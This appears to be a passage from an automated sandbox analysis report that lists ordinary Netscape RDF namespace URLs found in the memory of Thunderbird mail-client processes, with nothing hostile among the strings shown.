Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#BookmarkSeparatornaturaldescendingascendingundeterminednsTreeRowTest
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#CanCompact
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#CanCreateFoldersOnServer
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#CanCreateSubfolders
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#CanFileMessages
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#CanFileMessagesOnServer
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#CanGetIncomingMessages
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#CanGetMessages
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#CanRename
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#CanSearchMessages
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#CanSubscribe
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#CardChild
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Charset
Source: thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000008.00000002.2457636167.0000000000A3C000.00000002.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000000.2341233312.0000000000A3C000.00000002.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000009.00000002.2633767653.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000009.00000000.2456623788.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824396788.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000002.2988595385.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#CharsetDetector
Source: thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000008.00000002.2457636167.0000000000A3C000.00000002.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000000.2341233312.0000000000A3C000.00000002.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000009.00000002.2633767653.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000009.00000000.2456623788.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824396788.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000002.2988595385.0000000000A3C000.00000002.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Checked
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Compact
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#CompactAll
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Content-Length
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Copy
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#CopyFolder
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#DateEnded
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#DateStarted
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Delete
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#DeleteCards
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#DeleteCardshttp://home.netscape.com/NC-rdf#DirTreeNameSorthttp://hom
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Deletehttp://home.netscape.com/NC-rdf#Copyhttp://home.netscape.com/N
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#DirName
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#DirTreeNameSort
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#DirUri
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#DownloadFlaggedMessages
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#DownloadFlaggedMessageshttp://home.netscape.com/NC-rdf#MarkAllMessag
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#DownloadState
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#EmptyTrash
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Enabled
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Enabledfilter;filterName=filterName=MsgBiffinserting
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#File
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#FileSystemObject
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Folder
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#FolderSize
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#FolderTreeName
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#FolderTreeName?sort=true
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#FolderTreeSimpleName
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#GetNewMessages
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#HasUnreadMessages
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#IEFavorite
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#IEFavoriteFolder
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Icon
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#IconURL
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#Identity
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#ImapShared
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#InVFEditSearchScope
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#IsDefaultServer
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#IsDeferred
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#IsDirectory
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#IsMailList
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#IsRemote
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#IsSecure
Source: thunderbird.exe, 00000008.00000000.2341350812.0000000000B9E000.00000008.00000001.01000000.0000000D.sdmp, thunderbird.exe, 00000008.00000003.2452687011.00000000048B3000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000009.00000002.2633873253.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp, thunderbird.exe, 00000010.00000000.2824493366.0000000000B9E000.00000008.00000001.01000000.0000001B.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#IsServer
